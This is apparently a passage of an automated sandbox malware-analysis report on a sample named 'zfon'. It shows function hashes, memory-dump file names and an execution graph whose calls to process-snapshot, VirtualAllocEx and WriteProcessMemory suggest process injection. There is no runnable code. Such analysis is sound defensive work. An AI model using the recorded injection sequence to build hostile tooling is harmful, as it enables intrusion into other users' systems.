                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90ED47A
                                                                                                Strings
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FF8B90ED485
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$Getmonthsmallocmemcpy
                                                                                                • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece
                                                                                                • API String ID: 1628830074-2030377133
                                                                                                • Opcode ID: c82f8f9ad4e2d2af623f2a64a55ac3353b2c765cd361e64e07e7ab3c08dd46ed
                                                                                                • Instruction ID: f0e8f8d4a671ae56aa31a49a57d923024351419750fbe850cf608bdb7fd88813
                                                                                                • Opcode Fuzzy Hash: c82f8f9ad4e2d2af623f2a64a55ac3353b2c765cd361e64e07e7ab3c08dd46ed
                                                                                                • Instruction Fuzzy Hash: 74E03226A19B82A2EE409F1AF5883682360FF08BD4F882034DB0E03B50DF3CE4A48300
                                                                                                APIs
                                                                                                • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90ECCDD
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90ECCFA
                                                                                                Strings
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B90ECD05
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$Getdaysmallocmemcpy
                                                                                                • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                • API String ID: 1347072587-3283725177
                                                                                                • Opcode ID: 4369f42fca7dce3118de04e163d293b9be384bdf3f2632a8f01c906decda58a8
                                                                                                • Instruction ID: 1be3f2788db27d614da4953796360cf77b224dc8655593cf6aabe20b77ff123c
                                                                                                • Opcode Fuzzy Hash: 4369f42fca7dce3118de04e163d293b9be384bdf3f2632a8f01c906decda58a8
                                                                                                • Instruction Fuzzy Hash: A1E0C922A18B82A2EE049F1AF5453A96361EF48BC0F888434DB2D46755EF3CE4A4C300
                                                                                                APIs
                                                                                                • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90ECD4D
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90ECD6A
                                                                                                Strings
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FF8B90ECD75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$Getmonthsmallocmemcpy
                                                                                                • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
                                                                                                • API String ID: 1628830074-4232081075
                                                                                                • Opcode ID: db95abb9d15dbef39e6ee0859203eea4f630d3aba3162c7ecd3a84709e9a22e3
                                                                                                • Instruction ID: 767cf0326a54f3c4872c626ab141ffae7ecf344c2e8c24f08c4aacd82e87a3b1
                                                                                                • Opcode Fuzzy Hash: db95abb9d15dbef39e6ee0859203eea4f630d3aba3162c7ecd3a84709e9a22e3
                                                                                                • Instruction Fuzzy Hash: BEE0C921A18B82A2EE009F1AF5442696370EF58BD0F844435DB1D06795DF3CE5E5C340
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                • String ID: Unknown exception
                                                                                                • API String ID: 932687459-410509341
                                                                                                • Opcode ID: bc4d1c003b6ff2fe4e2c4e9266720bee0507f32f91a828decfd6544b21c815df
                                                                                                • Instruction ID: 33ef33fa99a0d901c00a695fea8fba57d503c3f8bfcef742c5bd201dd5733619
                                                                                                • Opcode Fuzzy Hash: bc4d1c003b6ff2fe4e2c4e9266720bee0507f32f91a828decfd6544b21c815df
                                                                                                • Instruction Fuzzy Hash: 9FD01722A29A8691EF10EF04DC813A8E330FB94348FD45432D16C825B9EF6DDA56C3A0
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF8BFAD3325,?,?,?,?,00007FF8BFAD41CA,?,?,?,?,?), ref: 00007FF8BFAD3483
                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF8BFAD3325,?,?,?,?,00007FF8BFAD41CA,?,?,?,?,?), ref: 00007FF8BFAD350B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1452528299-0
                                                                                                • Opcode ID: 868a6d6a1edc03e792c9974cc9c9f69a97d5c8a62993b42da19d3e438dcd092c
                                                                                                • Instruction ID: 6e23da31541fa1c5309176efc7d8b00789d56b685ff5d0457bd8d56831bd4bf7
                                                                                                • Opcode Fuzzy Hash: 868a6d6a1edc03e792c9974cc9c9f69a97d5c8a62993b42da19d3e438dcd092c
                                                                                                • Instruction Fuzzy Hash: 65117568E0970787FA3CA7ADA8021386755AF447E9F14A674DB2E473D4DE3CF4518700
                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF8BFB56CE9,?,?,?,?,00007FF8BFB605B2,?,?,?,?,?), ref: 00007FF8BFB56E83
                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF8BFB56CE9,?,?,?,?,00007FF8BFB605B2,?,?,?,?,?), ref: 00007FF8BFB56F0C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1452528299-0
                                                                                                • Opcode ID: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                                • Instruction ID: 48fd67f93faa6d6a3d199ab5748549f4bb91a93093c5a15e19bf58d72bd2ecb8
                                                                                                • Opcode Fuzzy Hash: 29fbcb28d85caf8942357daff49778de6b87ab13b42ab574bfe6367f35ca65f9
                                                                                                • Instruction Fuzzy Hash: 1E117F20F1E74792FA119BADA8641347392AF487E0F184638DB2E073D5DE3CF841C610
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 21e29c9922f19bdda75fb578db1eebbd38709f35706a816a21095b56aee0f4f3
                                                                                                • Instruction ID: 11113d1c6687d6315d471f8ca99ecb26f6db8220d6f80e47674e1a0263757f19
                                                                                                • Opcode Fuzzy Hash: 21e29c9922f19bdda75fb578db1eebbd38709f35706a816a21095b56aee0f4f3
                                                                                                • Instruction Fuzzy Hash: 88F0E726B58B82A2EB44AF1AF9942682334FB88BD0B544471CB4E43B70DF3CE4A59300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 2301427b651c3a47193e5a8d6ad951242187ad620a5bd31deb8cfb3ac87ac41d
                                                                                                • Instruction ID: 89392b1d4d9deb7f04fdc116e5588abeb52be545ff266be0e380937833636288
                                                                                                • Opcode Fuzzy Hash: 2301427b651c3a47193e5a8d6ad951242187ad620a5bd31deb8cfb3ac87ac41d
                                                                                                • Instruction Fuzzy Hash: C5F0E726B58B82A2EB44AF1AF9942682330FB88FD0F544471CB4D43B70DF2CE4A59300
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 1505eafe45e457f4db7c5ee298ec8fe61a246f9253c397c6ee0353011936a2de
                                                                                                • Instruction ID: edefc2c7c387e2af68a692bdf5cf12e7550f99ceb3fc66b6c556616258980fec
                                                                                                • Opcode Fuzzy Hash: 1505eafe45e457f4db7c5ee298ec8fe61a246f9253c397c6ee0353011936a2de
                                                                                                • Instruction Fuzzy Hash: 18F09726B5DB82A2EB44AF1AF9942782375FB88BD0F544471DB4D43B74DF2CE4A59300

                                                                                                Execution Graph

                                                                                                Execution Coverage:1.2%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:16.2%
                                                                                                Total number of Nodes:345
                                                                                                Total number of Limit Nodes:45
                                                                                                execution_graph 53441 2dc4be45890 53453 2dc4be45720 53441->53453 53443 2dc4be458bb CreateToolhelp32Snapshot 53444 2dc4be458d2 Process32FirstW 53443->53444 53445 2dc4be4591e 53443->53445 53444->53445 53446 2dc4be458ec 53444->53446 53480 2dc4be7beb0 53445->53480 53446->53445 53451 2dc4be4599a CloseHandle 53446->53451 53463 2dc4be9cc90 53446->53463 53451->53445 53452 2dc4be4597e _Maklocstr 53451->53452 53454 2dc4be45737 53453->53454 53521 2dc4be81550 53454->53521 53458 2dc4be457a2 53459 2dc4be7beb0 std::_Facet_Register 2 API calls 53458->53459 53460 2dc4be457f2 53459->53460 53537 2dc4be86810 53460->53537 53462 2dc4be4582d 53462->53443 53464 2dc4be9ccc1 53463->53464 53465 2dc4be9cc9d 53463->53465 53467 2dc4be9ccfb 53464->53467 53471 2dc4be9cd1a 53464->53471 53465->53464 53466 2dc4be9cca2 53465->53466 53598 2dc4bea07ac RtlFreeHeap _get_daylight 53466->53598 53600 2dc4bea07ac RtlFreeHeap _get_daylight 53467->53600 53469 2dc4be9cca7 53599 2dc4be9cb14 RtlFreeHeap _invalid_parameter_noinfo 53469->53599 53602 2dc4be9cbb4 RtlFreeHeap TranslateName _Getctype 53471->53602 53473 2dc4be9cd00 53601 2dc4be9cb14 RtlFreeHeap _invalid_parameter_noinfo 53473->53601 53475 2dc4be9ccb2 53475->53446 53477 2dc4be9cd27 53478 2dc4beae34c RtlFreeHeap TranslateName 53477->53478 53479 2dc4be9cd0b TranslateName 53477->53479 53478->53477 53479->53446 53482 2dc4be7bebb Concurrency::cancel_current_task std::_Facet_Register 53480->53482 53481 2dc4be45933 53485 2dc4be54260 53481->53485 53482->53481 53603 2dc4be41450 RtlFreeHeap RtlFreeHeap __std_exception_copy Concurrency::cancel_current_task 53482->53603 53484 2dc4be7beeb 53486 2dc4be542a5 53485->53486 53501 2dc4be542df 53486->53501 53612 2dc4be838a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53486->53612 53488 2dc4be543c7 53604 2dc4be53b30 53488->53604 53489 2dc4be542c8 53613 2dc4be86b20 RtlFreeHeap RtlFreeHeap 53489->53613 53494 2dc4be543e4 53496 2dc4be55f40 WriteProcessMemory 53494->53496 53500 2dc4be5448d 53496->53500 53502 2dc4be838a0 TlsFree RtlFreeHeap RtlFreeHeap 53500->53502 53515 2dc4be544d0 53500->53515 53501->53488 53614 2dc4be46fb0 RtlFreeHeap RtlFreeHeap ctype _invalid_parameter_noinfo_noreturn 53501->53614 53615 2dc4be7d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53501->53615 53616 2dc4be4ad40 RtlFreeHeap RtlFreeHeap 53501->53616 53617 2dc4be559d0 RtlFreeHeap RtlFreeHeap Concurrency::cancel_current_task ctype _invalid_parameter_noinfo_noreturn 53501->53617 53618 2dc4be86b40 2 API calls 4 library calls 53501->53618 53619 2dc4be7def0 RtlFreeHeap RtlFreeHeap 53501->53619 53620 2dc4be455e0 RtlFreeHeap ctype _invalid_parameter_noinfo_noreturn 53501->53620 53503 2dc4be544b9 53502->53503 53506 2dc4be86b20 RtlFreeHeap RtlFreeHeap 53503->53506 53505 2dc4be7d670 RtlFreeHeap RtlFreeHeap 53505->53515 53506->53515 53507 2dc4be46750 RtlFreeHeap RtlFreeHeap 53507->53515 53508 2dc4be54576 53509 2dc4be838a0 TlsFree RtlFreeHeap RtlFreeHeap 53508->53509 53520 2dc4be545cc 53508->53520 53510 2dc4be545b5 53509->53510 53512 2dc4be86b20 RtlFreeHeap RtlFreeHeap 53510->53512 53511 2dc4be7def0 RtlFreeHeap RtlFreeHeap 53511->53515 53512->53520 53513 2dc4be54670 _Maklocstr 53513->53452 53514 2dc4be7d670 RtlFreeHeap RtlFreeHeap 53514->53520 53515->53505 53515->53507 53515->53508 53515->53511 53516 2dc4be86b40 RtlFreeHeap RtlFreeHeap 53515->53516 53516->53515 53517 2dc4be46750 RtlFreeHeap RtlFreeHeap 53517->53520 53518 2dc4be7def0 RtlFreeHeap RtlFreeHeap 53518->53520 53519 2dc4be86b40 RtlFreeHeap RtlFreeHeap 53519->53520 53520->53513 53520->53514 53520->53517 53520->53518 53520->53519 53540 2dc4be81320 53521->53540 53523 2dc4be45767 53524 2dc4be492b0 53523->53524 53551 2dc4be4c3b0 53524->53551 53526 2dc4be4930b 53554 2dc4be4cda0 53526->53554 53528 2dc4be49336 53557 2dc4be82e40 53528->53557 53531 2dc4be493f0 53533 2dc4be7beb0 std::_Facet_Register 2 API calls 53531->53533 53532 2dc4be4936b 53560 2dc4be4ab50 53532->53560 53534 2dc4be49419 53533->53534 53535 2dc4be86810 2 API calls 53534->53535 53536 2dc4be494ab _Maklocstr 53535->53536 53536->53458 53585 2dc4be866a0 53537->53585 53539 2dc4be8681e 53539->53462 53547 2dc4be81340 53540->53547 53541 2dc4be7beb0 std::_Facet_Register 2 API calls 53541->53547 53542 2dc4be814ba 53544 2dc4be81507 53542->53544 53550 2dc4be7c268 RtlFreeHeap shared_ptr 53542->53550 53544->53523 53547->53541 53547->53542 53548 2dc4be814e0 RtlFreeHeap 53547->53548 53549 2dc4be81270 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53547->53549 53548->53547 53549->53547 53550->53544 53552 2dc4be7beb0 std::_Facet_Register 2 API calls 53551->53552 53553 2dc4be4c3ca 53552->53553 53553->53526 53555 2dc4be7beb0 std::_Facet_Register 2 API calls 53554->53555 53556 2dc4be4cdbc 53555->53556 53556->53528 53558 2dc4be7beb0 std::_Facet_Register 2 API calls 53557->53558 53559 2dc4be82e62 53558->53559 53559->53532 53571 2dc4be4ce00 53560->53571 53562 2dc4be4ab9b 53563 2dc4be7beb0 std::_Facet_Register 2 API calls 53562->53563 53564 2dc4be4abed 53563->53564 53565 2dc4be81550 2 API calls 53564->53565 53566 2dc4be4ac2f 53565->53566 53567 2dc4be7beb0 std::_Facet_Register 2 API calls 53566->53567 53568 2dc4be4ac39 53567->53568 53574 2dc4be576bc 53568->53574 53570 2dc4be4ac72 _Maklocstr 53570->53531 53572 2dc4be7beb0 std::_Facet_Register 2 API calls 53571->53572 53573 2dc4be4ce1a 53572->53573 53573->53562 53575 2dc4be576de std::_Lockit::_Lockit 53574->53575 53581 2dc4be57722 std::_Lockit::~_Lockit ctype 53575->53581 53582 2dc4be578e8 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53575->53582 53577 2dc4be576f6 53583 2dc4be57918 RtlFreeHeap std::locale::_Setgloballocale 53577->53583 53579 2dc4be57701 53579->53581 53584 2dc4bea1384 RtlFreeHeap RtlFreeHeap __free_lconv_num _get_daylight 53579->53584 53581->53570 53582->53577 53583->53579 53584->53581 53593 2dc4be866b7 53585->53593 53586 2dc4be867e4 53590 2dc4be86897 53586->53590 53597 2dc4be7c268 RtlFreeHeap shared_ptr 53586->53597 53587 2dc4be7beb0 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53587->53593 53590->53539 53593->53586 53593->53587 53594 2dc4be85cb0 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53593->53594 53595 2dc4be86870 RtlFreeHeap 53593->53595 53596 2dc4be84e30 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53593->53596 53594->53593 53595->53593 53596->53593 53597->53590 53598->53469 53599->53475 53600->53473 53601->53479 53602->53477 53603->53484 53605 2dc4be53b9d 53604->53605 53621 2dc4be55dd0 2 API calls 4 library calls 53605->53621 53607 2dc4be53bba 53608 2dc4be7beb0 std::_Facet_Register 2 API calls 53607->53608 53609 2dc4be53bc7 53608->53609 53610 2dc4be7beb0 std::_Facet_Register 2 API calls 53609->53610 53611 2dc4be53bfc 53610->53611 53612->53489 53613->53501 53614->53501 53615->53501 53616->53501 53617->53501 53618->53501 53620->53501 53621->53607 53622 2dc4be54080 53637 2dc4be55ec0 VirtualAllocEx 53622->53637 53624 2dc4be540c5 53632 2dc4be5411c 53624->53632 53644 2dc4be838a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53624->53644 53627 2dc4be54101 53645 2dc4be86b20 RtlFreeHeap RtlFreeHeap 53627->53645 53629 2dc4be5421c _Maklocstr 53632->53629 53646 2dc4be46fb0 RtlFreeHeap RtlFreeHeap ctype _invalid_parameter_noinfo_noreturn 53632->53646 53647 2dc4be7d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53632->53647 53648 2dc4be4ad40 RtlFreeHeap RtlFreeHeap 53632->53648 53649 2dc4be559d0 RtlFreeHeap RtlFreeHeap Concurrency::cancel_current_task ctype _invalid_parameter_noinfo_noreturn 53632->53649 53650 2dc4be86b40 2 API calls 4 library calls 53632->53650 53651 2dc4be7def0 RtlFreeHeap RtlFreeHeap 53632->53651 53652 2dc4be455e0 RtlFreeHeap ctype _invalid_parameter_noinfo_noreturn 53632->53652 53638 2dc4be55ee4 53637->53638 53639 2dc4be55eed 53637->53639 53638->53624 53653 2dc4be52a60 2 API calls 5 library calls 53639->53653 53641 2dc4be55f17 53654 2dc4be41510 RtlFreeHeap RtlFreeHeap __std_exception_copy _Maklocstr 53641->53654 53643 2dc4be55f25 Concurrency::cancel_current_task 53644->53627 53645->53632 53646->53632 53647->53632 53648->53632 53649->53632 53650->53632 53652->53632 53653->53641 53654->53643 53655 2dc4be54740 53658 2dc4be53dd0 53655->53658 53657 2dc4be5475c 53659 2dc4be53e23 53658->53659 53674 2dc4be41630 53659->53674 53661 2dc4be53e99 53668 2dc4be53f24 53661->53668 53682 2dc4be838a0 TlsFree RtlFreeHeap RtlFreeHeap std::_Facet_Register 53661->53682 53664 2dc4be53f0a 53683 2dc4be86b20 RtlFreeHeap RtlFreeHeap 53664->53683 53665 2dc4be54038 _Maklocstr 53665->53657 53668->53665 53684 2dc4be46fb0 RtlFreeHeap RtlFreeHeap ctype _invalid_parameter_noinfo_noreturn 53668->53684 53685 2dc4be7d670 RtlFreeHeap RtlFreeHeap std::_Facet_Register 53668->53685 53686 2dc4be4ad40 RtlFreeHeap RtlFreeHeap 53668->53686 53687 2dc4be559d0 RtlFreeHeap RtlFreeHeap Concurrency::cancel_current_task ctype _invalid_parameter_noinfo_noreturn 53668->53687 53688 2dc4be86b40 2 API calls 4 library calls 53668->53688 53689 2dc4be7def0 RtlFreeHeap RtlFreeHeap 53668->53689 53690 2dc4be455e0 RtlFreeHeap ctype _invalid_parameter_noinfo_noreturn 53668->53690 53675 2dc4be416c5 53674->53675 53691 2dc4be42030 53675->53691 53677 2dc4be41be4 